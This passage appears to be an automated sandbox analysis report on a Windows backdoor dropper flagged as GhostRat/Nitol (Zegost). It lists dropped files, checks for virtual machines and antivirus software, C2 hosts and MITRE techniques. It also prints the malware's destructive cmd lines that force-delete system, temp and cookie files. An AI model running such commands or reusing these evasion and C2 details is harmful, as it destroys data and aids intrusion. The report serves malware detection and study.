              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
              Source: C:\Windows\Temp\ .exeFile opened: C:\Users\userJump to behavior
              Source: server.exe, 00000003.00000002.3288563032.000000000048D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
              Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh-|%SystemRoot%\system32\mswsock.dllu
              Source: .exe.0.drBinary or memory string: 00-50-56 VMWare, Inc.
              Source: .exe, 00000005.00000003.1413768586.00000000027EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00-0C-29 VMware, Inc.)
              Source: .exe.0.drBinary or memory string: 00-1C-14 VMware, Inc
              Source: .exe.0.drBinary or memory string: 00-0C-29 VMware, Inc.
              Source: v5.exe, 00000004.00000003.1995685652.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2542629725.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.3205650213.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2424630917.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2828856783.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2752766091.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2301742269.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.3338719356.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2301597675.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2289452448.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2597998486.00000000007BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: .exe.0.drBinary or memory string: 00-05-69 VMWARE, Inc.
              Source: v5.exe, 00000002.00000002.1383867254.000000000065D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeAPI call chain: ExitProcess graph end nodegraph_0-3101
              Source: C:\Windows\Temp\v5.exeAPI call chain: ExitProcess graph end nodegraph_2-1410
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20249
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20270
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20256
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-20272
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-19946
              Source: C:\Windows\Temp\server.exeAPI call chain: ExitProcess graph end nodegraph_3-19489
              Source: C:\Windows\Temp\server.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F3A0 BlockInput,BlockInput,3_2_1000F3A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
              Source: C:\Windows\Temp\server.exeCode function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,3_2_00401000
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0044F257 SetUnhandledExceptionFilter,5_2_0044F257
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0044F26B SetUnhandledExceptionFilter,5_2_0044F26B
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,3_2_1000F840
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,3_2_1000F840
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe" Jump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe" Jump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe" Jump to behavior
              Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,5_2_00401680
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,5_2_00401680
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10025DC0 cpuid 3_2_10025DC0
              Source: C:\Windows\Temp\ .exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,5_2_0045F814
              Source: C:\Windows\Temp\ .exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,5_2_00401060
              Source: C:\Windows\Temp\ .exeCode function: GetLocaleInfoA,5_2_00451400
              Source: C:\Windows\Temp\ .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
              Source: C:\Windows\Temp\ .exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6CFC6DE0,6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep,2_2_00402AD0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,3_2_10007070
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA,5_2_00433020
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF
              Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected GhostRat
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Yara detected Nitol
              Source: Yara matchFile source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: server.exe PID: 7708, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected GhostRat
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Yara detected Nitol
              Source: Yara matchFile source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: server.exe PID: 7708, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		121
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		21
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts12
              Native API              		13
              Windows Service              		1
              Access Token Manipulation              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol121
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		13
              Windows Service              		21
              Obfuscated Files or Information              		Security Account Manager1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts12
              Service Execution              		Login Hook12
              Process Injection              		1
              Software Packing              		NTDS4
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		LSA Secrets65
              System Information Discovery              		SSHKeylogging1
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              File Deletion              		Cached Domain Credentials1
              Network Share Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Masquerading              		DCSync361
              Security Software Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
              Virtualization/Sandbox Evasion              		Proc Filesystem231
              Virtualization/Sandbox Evasion              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadow12
              Process Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
              Process Injection              		Network Sniffing11
              Application Window Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Indicator Removal              		Input Capture1
              System Owner/User Discovery              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
              Remote System Discovery              		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd TimersCommand ObfuscationGUI Input Capture1
              System Network Configuration Discovery              		Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579781 Sample: G3izWAY3Fa.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 78 58 chinagov.8800.org 2->58 80 Suricata IDS alerts for network traffic 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for dropped file 2->84 86 9 other signatures 2->86 9 G3izWAY3Fa.exe 8 2->9         started        12 v5.exe 2->12         started        signatures3 process4 dnsIp5 52 C:\Windows\Temp\v5.exe, PE32 9->52 dropped 54 C:\Windows\Temp\server.exe, PE32 9->54 dropped 56 C:\Windows\Temp\            .exe, PE32 9->56 dropped 15 server.exe 1 3 9->15         started        20 v5.exe 1 9->20         started        22            .exe 19 9->22         started        60 chinagov.8800.org 93.46.8.90, 49761, 49841, 49928 FASTWEBIT Italy 12->60 62 192.168.2.1, 80 unknown unknown 12->62 file6 process7 dnsIp8 64 120.48.34.233, 49717, 49723, 49770 CHINANET-BACKBONENo31Jin-rongStreetCN China 15->64 50 C:\Windows\XXXXXX05CA35CC\svchsot.exe, PE32 15->50 dropped 66 Antivirus detection for dropped file 15->66 68 Multi AV Scanner detection for dropped file 15->68 70 Machine Learning detection for dropped file 15->70 78 5 other signatures 15->78 72 Contains functionality to enumerate network shares of other devices 20->72 74 Found evasive API chain (may stop execution after checking mutex) 20->74 76 Deletes itself after installation 20->76 24 cmd.exe 20->24         started        26 cmd.exe 22->26         started        28 cmd.exe 22->28         started        30 cmd.exe 22->30         started        32 45 other processes 22->32 file9 signatures10 process11 process12 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 32->44         started        46 conhost.exe 32->46         started        48 42 other processes 32->48

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              G3izWAY3Fa.exe87%ReversingLabsWin32.Backdoor.Zegost
              G3izWAY3Fa.exe100%AviraHEUR/AGEN.1337945

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Windows\XXXXXX05CA35CC\svchsot.exe100%AviraBDS/Zegost.birna
              C:\Windows\Temp\server.exe100%AviraBDS/Zegost.birna
              C:\Windows\Temp\v5.exe100%AviraTR/Staser.apzjs
              C:\Windows\XXXXXX05CA35CC\svchsot.exe100%Joe Sandbox ML
              C:\Windows\Temp\server.exe100%Joe Sandbox ML
              C:\Windows\Temp\v5.exe100%Joe Sandbox ML
              C:\Windows\Temp\ .exe4%ReversingLabs
              C:\Windows\Temp\server.exe95%ReversingLabsWin32.Backdoor.Farfli
              C:\Windows\Temp\v5.exe100%ReversingLabsWin32.Trojan.MintZard
              C:\Windows\XXXXXX05CA35CC\svchsot.exe95%ReversingLabsWin32.Backdoor.Farfli

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              chinagov.8800.org
              		93.46.8.90
              		truetrue
                		unknown
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://192.168.2.1v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorG3izWAY3Fa.exefalse
                      		high
